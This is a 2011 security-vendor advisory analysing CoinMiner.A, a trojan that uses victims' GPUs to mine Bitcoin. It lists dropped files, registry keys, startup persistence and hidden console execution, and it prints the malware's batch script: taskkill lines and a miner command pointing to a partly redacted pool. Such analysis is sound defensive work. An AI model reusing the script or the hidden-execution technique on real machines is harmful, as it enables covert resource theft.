New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)

The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive and would take an impractical amount of time to generate a single bitcoin on a personal computer. If however, a hacker were able to compromise a handful of machines with fast parallel Graphics Processing Units it could turn into a very lucrative money making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

• C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd
• C:Documents and Settings{USER}Local SettingsTempacchsbca.exe
• C:Documents and Settings{USER}Local SettingsTempaccmamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
• C:Documents and Settings{USER}Start MenuProgramsStartupwuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

ping -n 40 google.com
taskkill /f /im cgminer.exe
taskkill /f /im svchoost.exe
taskkill /f /im mamatije.exe
taskkill /f /im mamatije2.exe
taskkill /f /im mamatije3.exe
taskkill /f /im yaaa3.2.exe
taskkill /f /im WinMine.exe
taskkill /f /im mamatije4.exe
mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

• HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Start MenuProgramsStartup “C:Documents and Settings{USER}Start MenuProgramsStartup”
• HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Local SettingsTempacc “C:Documents and Settings{USER}Local SettingsTempacc”

The Trojan attemps to open the following files:

• C:Documents and Settings{USER}Start menuProgramsStartupstart.exe
• C:Documents and Settings{USER}Start MenuProgramsStartuphahahahaha.exe
• C:Documents and Settings{USER}Start MenuProgramsStartupwuT.exe
• C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk.exe
• C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run “3kal.cmd” via the following command:

C:Documents and Settings{USER}Local SettingsTempacchsbca.exe "/NOCONSOLE C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

• ping -n 40 google.com

As defined in “3kal.cmd” the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

• cgminer.exe
• svchoost.exe
• mamatije.exe
• mamatije2.exe
• mamatije3.exe
• yaaa3.2.exe
• WinMine.exe
• mamatije4.exe

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

• GAV: CoinMiner.A (Trojan)
• GAV: CoinMiner.A_2 (Trojan)
• GAV: CoinMiner.A_3 (Trojan)

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.